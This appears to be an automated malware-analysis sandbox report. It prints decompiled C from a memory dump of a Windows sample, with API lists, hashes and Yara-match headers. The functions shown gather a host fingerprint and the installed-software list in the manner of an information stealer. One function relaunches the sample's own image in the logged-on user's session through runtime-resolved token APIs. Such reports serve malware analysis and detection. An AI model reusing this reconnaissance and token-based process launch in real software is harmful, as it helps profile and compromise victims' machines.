                            				 *_t59 =  *_t59 + _t59;
                            				asm("das");
                            				 *_t59 =  *_t59 + _t59;
                            				 *__edx =  *__edx + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 & _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				_t60 = _t59 +  *_t59;
                            				 *_t60 =  *_t60 + _t60;
                            				 *_t60 =  *_t60 + _t60;
                            				_t184 = _t185;
                            				_t143 = 0xc;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t143 = _t143 - 1;
                            					_t191 = _t143;
                            				} while (_t143 != 0);
                            				_t142 = _t60;
                            				_push(_t184);
                            				_push(0x416c78);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t185;
                            				_push("MachineID :   ");
                            				E00406CE8( &_v8, _t142, __esi);
                            				_push(_v8);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t142);
                            				_push("EXE_PATH  :   ");
                            				E00416684(0,  &_v12);
                            				_push(_v12);
                            				_push(0x416cc8);
                            				E00403850();
                            				_push( *_t142);
                            				_push("Windows    :   ");
                            				E00407B08( &_v28, _t142, _t181, __esi);
                            				_push(_v28);
                            				_push(0x416cf0);
                            				E00403850();
                            				E00403D88( &_v20, _v24);
                            				_push(_v20);
                            				E004066E4( &_v32, _t191);
                            				_push(_v32);
                            				_push(0x416cf8);
                            				E00406BD8( &_v36);
                            				_push(_v36);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t142, _v16);
                            				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
                            				E00403D88( &_v44, _v48);
                            				_push(_v44);
                            				E00406634( &_v52);
                            				_push(_v52);
                            				_push(0x416d2c);
                            				E004065F0( &_v56);
                            				_push(_v56);
                            				_push(0x416d34);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t142, _v40);
                            				E004037DC( &_v68, "Screen: ",  *_t142);
                            				E00403D88( &_v64, _v68);
                            				_push(_v64);
                            				E0040709C(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
                            				_push(_v72);
                            				_push(0x416d50);
                            				E0040709C(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
                            				_push(_v76);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t142, _v60);
                            				_push( *_t142);
                            				_push("Layouts: ");
                            				E004166B4( &_v80, _t142, _t181, _t182);
                            				_push(_v80);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t142);
                            				_push("LocalTime: ");
                            				E00416894( &_v84, _t142, _t182);
                            				_push(_v84);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t142);
                            				_push("Zone: ");
                            				E00416794( &_v88, _t142, _t181, _t182, _t191);
                            				_push(_v88);
                            				_push(0x416cc8);
                            				E00403850();
                            				_push( *_t142);
                            				E00415E44( &_v92, _t142, _t181, _t182);
                            				_push(_v92);
                            				_push(0x416cc8);
                            				E00403850();
                            				Sleep(1);
                            				_push( *_t142);
                            				E00416290( &_v96, _t142, _t181, _t182, _t191);
                            				_push(_v96);
                            				_push(0x416ca4);
                            				_push(0x416ca4);
                            				E00403850();
                            				Sleep(1);
                            				_push( *_t142);
                            				_push("[Soft]");
                            				E00403850();
                            				Sleep(1);
                            				E0041564C( &_v100, _t142, _t181, _t182);
                            				E00403798(_t142, _v100);
                            				_t173 = 0x416ca4;
                            				 *[fs:eax] = _t173;
                            				_push(E00416C7F);
                            				E00403508( &_v100, 6);
                            				E00403BF4( &_v76, 2);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 4);
                            				E00403508( &_v28, 2);
                            				E00403BF4( &_v20, 2);
                            				return E00403508( &_v12, 2);
                            			}

                            Instruction addresses (the address column that accompanies the decompiled listing above, one entry per statement, in listing order): 0x00416974 0x00416974 0x00416976 0x00416978 0x00416979 0x0041697b 0x0041697d 0x0041697f 0x00416980 0x00416982 0x00416984 0x00416986 0x0041698a 0x0041698d 0x0041698f 0x00416994 0x00416994 0x00416996 0x00416998 0x00416998 0x00416998 0x0041699c 0x004169a0 0x004169a1 0x004169a6 0x004169a9 0x004169ac 0x004169b4 0x004169b9 0x004169bc 0x004169c8 0x004169cd 0x004169cf 0x004169d9 0x004169de 0x004169e1 0x004169ed 0x004169f2 0x004169f4 0x004169fc 0x00416a01 0x00416a04 0x00416a11 0x00416a1c 0x00416a21 0x00416a27 0x00416a2c 0x00416a2f 0x00416a37 0x00416a3c 0x00416a3f 0x00416a4c 0x00416a56 0x00416a65 0x00416a70 0x00416a75 0x00416a7b 0x00416a80 0x00416a83 0x00416a8b 0x00416a90 0x00416a93 0x00416a98 0x00416aa5 0x00416aaf 0x00416abe 0x00416ac9 0x00416ace 0x00416adb 0x00416ae0 0x00416ae3 0x00416af2 0x00416af7 0x00416afa 0x00416b07 0x00416b11 0x00416b16 0x00416b18 0x00416b20 0x00416b25 0x00416b28 0x00416b34 0x00416b39 0x00416b3b 0x00416b43 0x00416b48 0x00416b4b 0x00416b57 0x00416b5c 0x00416b5e 0x00416b66 0x00416b6b 0x00416b6e 0x00416b7a 0x00416b7f 0x00416b84 0x00416b89 0x00416b8c 0x00416b98 0x00416b9f 0x00416ba4 0x00416ba9 0x00416bae 0x00416bb1 0x00416bb6 0x00416bc2 0x00416bc9 0x00416bce 0x00416bd0 0x00416be1 0x00416be8 0x00416bf0 0x00416bfa 0x00416c01 0x00416c04 0x00416c07 0x00416c14 0x00416c21 0x00416c29 0x00416c36 0x00416c3e 0x00416c4b 0x00416c58 0x00416c65 0x00416c77

                            APIs
                            • GetSystemMetrics.USER32 ref: 00416AD3
                            • GetSystemMetrics.USER32 ref: 00416AEA
                              • Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                            • Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
                            • Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8
                              • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                              • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                            • API String ID: 75899496-943277980
                            • Opcode ID: 60dc013b294cd3571c817187dd54daba4cfcc5ebfeb65134b18bef8d8193c09a
                            • Instruction ID: 772785f2c09445a84a7b2349d24cb582ce7330fa6bd2b57fe2dee83489952c98
                            • Opcode Fuzzy Hash: 60dc013b294cd3571c817187dd54daba4cfcc5ebfeb65134b18bef8d8193c09a
                            • Instruction Fuzzy Hash: C8812C70A40209ABCB01FFA1DC42BCDBB79EF49309F61807BB104B6196D67DEA458B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E00416978(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				char _v100;
                            				intOrPtr* _t59;
                            				intOrPtr* _t141;
                            				void* _t142;
                            				intOrPtr _t172;
                            				void* _t180;
                            				intOrPtr _t183;
                            				intOrPtr _t184;
                            
                            				_t181 = __esi;
                            				asm("das");
                            				 *__eax =  *__eax + __eax;
                            				 *__edx =  *__edx + __eax;
                            				 *__eax =  *__eax + __eax;
                            				 *__eax =  *__eax + __eax;
                            				 *__eax =  *__eax & __eax;
                            				 *__eax =  *__eax + __eax;
                            				_t59 = __eax +  *__eax;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				_t183 = _t184;
                            				_t142 = 0xc;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t142 = _t142 - 1;
                            					_t189 = _t142;
                            				} while (_t142 != 0);
                            				_t141 = _t59;
                            				_push(_t183);
                            				_push(0x416c78);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t184;
                            				_push("MachineID :   ");
                            				E00406CE8( &_v8, _t141, __esi);
                            				_push(_v8);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t141);
                            				_push("EXE_PATH  :   ");
                            				E00416684(0,  &_v12);
                            				_push(_v12);
                            				_push(0x416cc8);
                            				E00403850();
                            				_push( *_t141);
                            				_push("Windows    :   ");
                            				E00407B08( &_v28, _t141, _t180, __esi);
                            				_push(_v28);
                            				_push(0x416cf0);
                            				E00403850();
                            				E00403D88( &_v20, _v24);
                            				_push(_v20);
                            				E004066E4( &_v32, _t189);
                            				_push(_v32);
                            				_push(0x416cf8);
                            				E00406BD8( &_v36);
                            				_push(_v36);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t141, _v16);
                            				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
                            				E00403D88( &_v44, _v48);
                            				_push(_v44);
                            				E00406634( &_v52);
                            				_push(_v52);
                            				_push(0x416d2c);
                            				E004065F0( &_v56);
                            				_push(_v56);
                            				_push(0x416d34);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t141, _v40);
                            				E004037DC( &_v68, "Screen: ",  *_t141);
                            				E00403D88( &_v64, _v68);
                            				_push(_v64);
                            				E0040709C(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
                            				_push(_v72);
                            				_push(0x416d50);
                            				E0040709C(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
                            				_push(_v76);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t141, _v60);
                            				_push( *_t141);
                            				_push("Layouts: ");
                            				E004166B4( &_v80, _t141, _t180, _t181);
                            				_push(_v80);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t141);
                            				_push("LocalTime: ");
                            				E00416894( &_v84, _t141, _t181);
                            				_push(_v84);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t141);
                            				_push("Zone: ");
                            				E00416794( &_v88, _t141, _t180, _t181, _t189);
                            				_push(_v88);
                            				_push(0x416cc8);
                            				E00403850();
                            				_push( *_t141);
                            				E00415E44( &_v92, _t141, _t180, _t181);
                            				_push(_v92);
                            				_push(0x416cc8);
                            				E00403850();
                            				Sleep(1);
                            				_push( *_t141);
                            				E00416290( &_v96, _t141, _t180, _t181, _t189);
                            				_push(_v96);
                            				_push(0x416ca4);
                            				_push(0x416ca4);
                            				E00403850();
                            				Sleep(1);
                            				_push( *_t141);
                            				_push("[Soft]");
                            				E00403850();
                            				Sleep(1);
                            				E0041564C( &_v100, _t141, _t180, _t181);
                            				E00403798(_t141, _v100);
                            				_t172 = 0x416ca4;
                            				 *[fs:eax] = _t172;
                            				_push(E00416C7F);
                            				E00403508( &_v100, 6);
                            				E00403BF4( &_v76, 2);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 4);
                            				E00403508( &_v28, 2);
                            				E00403BF4( &_v20, 2);
                            				return E00403508( &_v12, 2);
                            			}

                            0x00416978
                            0x00416978
                            0x00416979
                            0x0041697b
                            0x0041697d
                            0x0041697f
                            0x00416980
                            0x00416982
                            0x00416984
                            0x00416986
                            0x0041698a
                            0x0041698d
                            0x0041698f
                            0x00416994
                            0x00416994
                            0x00416996
                            0x00416998
                            0x00416998
                            0x00416998
                            0x0041699c
                            0x004169a0
                            0x004169a1
                            0x004169a6
                            0x004169a9
                            0x004169ac
                            0x004169b4
                            0x004169b9
                            0x004169bc
                            0x004169c8
                            0x004169cd
                            0x004169cf
                            0x004169d9
                            0x004169de
                            0x004169e1
                            0x004169ed
                            0x004169f2
                            0x004169f4
                            0x004169fc
                            0x00416a01
                            0x00416a04
                            0x00416a11
                            0x00416a1c
                            0x00416a21
                            0x00416a27
                            0x00416a2c
                            0x00416a2f
                            0x00416a37
                            0x00416a3c
                            0x00416a3f
                            0x00416a4c
                            0x00416a56
                            0x00416a65
                            0x00416a70
                            0x00416a75
                            0x00416a7b
                            0x00416a80
                            0x00416a83
                            0x00416a8b
                            0x00416a90
                            0x00416a93
                            0x00416a98
                            0x00416aa5
                            0x00416aaf
                            0x00416abe
                            0x00416ac9
                            0x00416ace
                            0x00416adb
                            0x00416ae0
                            0x00416ae3
                            0x00416af2
                            0x00416af7
                            0x00416afa
                            0x00416b07
                            0x00416b11
                            0x00416b16
                            0x00416b18
                            0x00416b20
                            0x00416b25
                            0x00416b28
                            0x00416b34
                            0x00416b39
                            0x00416b3b
                            0x00416b43
                            0x00416b48
                            0x00416b4b
                            0x00416b57
                            0x00416b5c
                            0x00416b5e
                            0x00416b66
                            0x00416b6b
                            0x00416b6e
                            0x00416b7a
                            0x00416b7f
                            0x00416b84
                            0x00416b89
                            0x00416b8c
                            0x00416b98
                            0x00416b9f
                            0x00416ba4
                            0x00416ba9
                            0x00416bae
                            0x00416bb1
                            0x00416bb6
                            0x00416bc2
                            0x00416bc9
                            0x00416bce
                            0x00416bd0
                            0x00416be1
                            0x00416be8
                            0x00416bf0
                            0x00416bfa
                            0x00416c01
                            0x00416c04
                            0x00416c07
                            0x00416c14
                            0x00416c21
                            0x00416c29
                            0x00416c36
                            0x00416c3e
                            0x00416c4b
                            0x00416c58
                            0x00416c65
                            0x00416c77

                            APIs
                            • GetSystemMetrics.USER32 ref: 00416AD3
                            • GetSystemMetrics.USER32 ref: 00416AEA
                              • Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                            • Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
                            • Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8
                              • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                              • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                            • API String ID: 75899496-943277980
                            • Opcode ID: 28bfc0a8fc3c13f9a819c7c350de19ea6d797103c580f24c512547b95e8ad12f
                            • Instruction ID: ba9566fa5802b655d19b309e0ce3e7f0f20b9e85fb6ad6d3dc3daba04cc241c3
                            • Opcode Fuzzy Hash: 28bfc0a8fc3c13f9a819c7c350de19ea6d797103c580f24c512547b95e8ad12f
                            • Instruction Fuzzy Hash: 70811D70A40209ABCB01FFA1DC42BCDBB79EF45309F61807BB104B61D6D67DEA458B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E0041698C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				char _v100;
                            				intOrPtr* _t140;
                            				void* _t141;
                            				intOrPtr _t171;
                            				intOrPtr _t182;
                            				intOrPtr _t183;
                            
                            				_t180 = __esi;
                            				_t179 = __edi;
                            				_t182 = _t183;
                            				_t141 = 0xc;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t141 = _t141 - 1;
                            					_t184 = _t141;
                            				} while (_t141 != 0);
                            				_t140 = __eax;
                            				_push(_t182);
                            				_push(0x416c78);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t183;
                            				_push("MachineID :   ");
                            				E00406CE8( &_v8, __eax, __esi);
                            				_push(_v8);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t140);
                            				_push("EXE_PATH  :   ");
                            				E00416684(0,  &_v12);
                            				_push(_v12);
                            				_push(0x416cc8);
                            				E00403850();
                            				_push( *_t140);
                            				_push("Windows    :   ");
                            				E00407B08( &_v28, _t140, __edi, __esi);
                            				_push(_v28);
                            				_push(0x416cf0);
                            				E00403850();
                            				E00403D88( &_v20, _v24);
                            				_push(_v20);
                            				E004066E4( &_v32, _t184);
                            				_push(_v32);
                            				_push(0x416cf8);
                            				E00406BD8( &_v36);
                            				_push(_v36);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t140, _v16);
                            				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
                            				E00403D88( &_v44, _v48);
                            				_push(_v44);
                            				E00406634( &_v52);
                            				_push(_v52);
                            				_push(0x416d2c);
                            				E004065F0( &_v56);
                            				_push(_v56);
                            				_push(0x416d34);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t140, _v40);
                            				E004037DC( &_v68, "Screen: ",  *_t140);
                            				E00403D88( &_v64, _v68);
                            				_push(_v64);
                            				E0040709C(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
                            				_push(_v72);
                            				_push(0x416d50);
                            				E0040709C(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
                            				_push(_v76);
                            				_push(0x416d00);
                            				E00403E78();
                            				E0040377C(_t140, _v60);
                            				_push( *_t140);
                            				_push("Layouts: ");
                            				E004166B4( &_v80, _t140, __edi, _t180);
                            				_push(_v80);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t140);
                            				_push("LocalTime: ");
                            				E00416894( &_v84, _t140, _t180);
                            				_push(_v84);
                            				_push(0x416ca4);
                            				E00403850();
                            				_push( *_t140);
                            				_push("Zone: ");
                            				E00416794( &_v88, _t140, _t179, _t180, _t184);
                            				_push(_v88);
                            				_push(0x416cc8);
                            				E00403850();
                            				_push( *_t140);
                            				E00415E44( &_v92, _t140, _t179, _t180);
                            				_push(_v92);
                            				_push(0x416cc8);
                            				E00403850();
                            				Sleep(1);
                            				_push( *_t140);
                            				E00416290( &_v96, _t140, _t179, _t180, _t184);
                            				_push(_v96);
                            				_push(0x416ca4);
                            				_push(0x416ca4);
                            				E00403850();
                            				Sleep(1);
                            				_push( *_t140);
                            				_push("[Soft]");
                            				E00403850();
                            				Sleep(1);
                            				E0041564C( &_v100, _t140, _t179, _t180);
                            				E00403798(_t140, _v100);
                            				_t171 = 0x416ca4;
                            				 *[fs:eax] = _t171;
                            				_push(E00416C7F);
                            				E00403508( &_v100, 6);
                            				E00403BF4( &_v76, 2);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 4);
                            				E00403508( &_v28, 2);
                            				E00403BF4( &_v20, 2);
                            				return E00403508( &_v12, 2);
                            			}

                            0x0041698c
                            0x0041698c
                            0x0041698d
                            0x0041698f
                            0x00416994
                            0x00416994
                            0x00416996
                            0x00416998
                            0x00416998
                            0x00416998
                            0x0041699c
                            (instruction address column, 0x004169a0 to 0x00416c77, omitted)

                            APIs
                            • GetSystemMetrics.USER32 ref: 00416AD3
                            • GetSystemMetrics.USER32 ref: 00416AEA
                              • Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                              • Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                              • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                            • Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
                            • Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8
                              • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                              • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                            • API String ID: 75899496-943277980
                            • Opcode ID: 78db04d285f91a2d8200e2e459f726382f96d17f141597859092816098249816
                            • Instruction ID: b8284bc9f62184e4db5d5ca1727f6710c034d5e6d015895e5eeee5dd02488032
                            • Opcode Fuzzy Hash: 78db04d285f91a2d8200e2e459f726382f96d17f141597859092816098249816
                            • Instruction Fuzzy Hash: 2F711C70A40109ABDF01FFE1DC42BCDBB79EF48709F61803BB104B6296D67DEA458A59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E00407E8F(void* __ebx, void* __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v36;
                            				intOrPtr _v96;
                            				char _v104;
                            				char _v108;
                            				intOrPtr _v117;
                            				_Unknown_base(*)()* _t27;
                            				_Unknown_base(*)()* _t29;
                            				intOrPtr* _t60;
                            				intOrPtr _t73;
                            				intOrPtr* _t75;
                            				void* _t78;
                            				void* _t80;
                            
                            				_v117 = _v117 + __edx;
                            				_v108 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				 *[fs:eax] = _t80 + 0xffffff98;
                            				/* The session, token and environment APIs are resolved at runtime instead of being imported. */
                            				_t27 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
                            				_t29 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
                            				_t75 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
                            				E00402754(0,  &_v108); /* subcall 00402754 calls GetModuleFileNameA (see APIs below): the sample's own image path */
                            				E00403D88( &_v16, _v108);
                            				E00404F5C();
                            				_v104 = 0x44; /* STARTUPINFOA.cb = sizeof(STARTUPINFOA) = 0x44 */
                            				_v96 = 0;
                            				 *_t27( *[fs:eax], 0x407fa6, _t80, __edi, __esi, __ebx, _t78); /* WTSGetActiveConsoleSessionId(); the listed arguments are decompiler stack noise */
                            				_push( &_v12);
                            				_push(0);
                            				if( *_t29() != 0) { /* WTSQueryUserToken(session, &_v12): primary token of that session's logged-on user */
                            					 *_t75( &_v20, _v12, 0xffffffff); /* CreateEnvironmentBlock(&_v20, token, bInherit = -1, Delphi True) */
                            					_t60 =  *0x41b32c; // 0x41c724  -- import thunk, not named in this report
                            					/* 11 arguments in CreateProcessAsUser order: token, application path (_v16), command line (_v8),
                            					   no security attributes, no handle inheritance, 0x400 = CREATE_UNICODE_ENVIRONMENT, environment block, no cwd, &si, &pi */
                            					 *((intOrPtr*)( *_t60))(_v12, E00403D98(_v16), E00403D98(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
                            					asm("sbb eax, eax");
                            				}
                            				_pop(_t73);
                            				 *[fs:eax] = _t73;
                            				_push(E00407FAD);
                            				E004034E4( &_v108);
                            				E00403BDC( &_v16);
                            				return E00403BDC( &_v8);
                            			}

                            (instruction address column, 0x00407e8f to 0x00407fa5, omitted)

                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                            • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
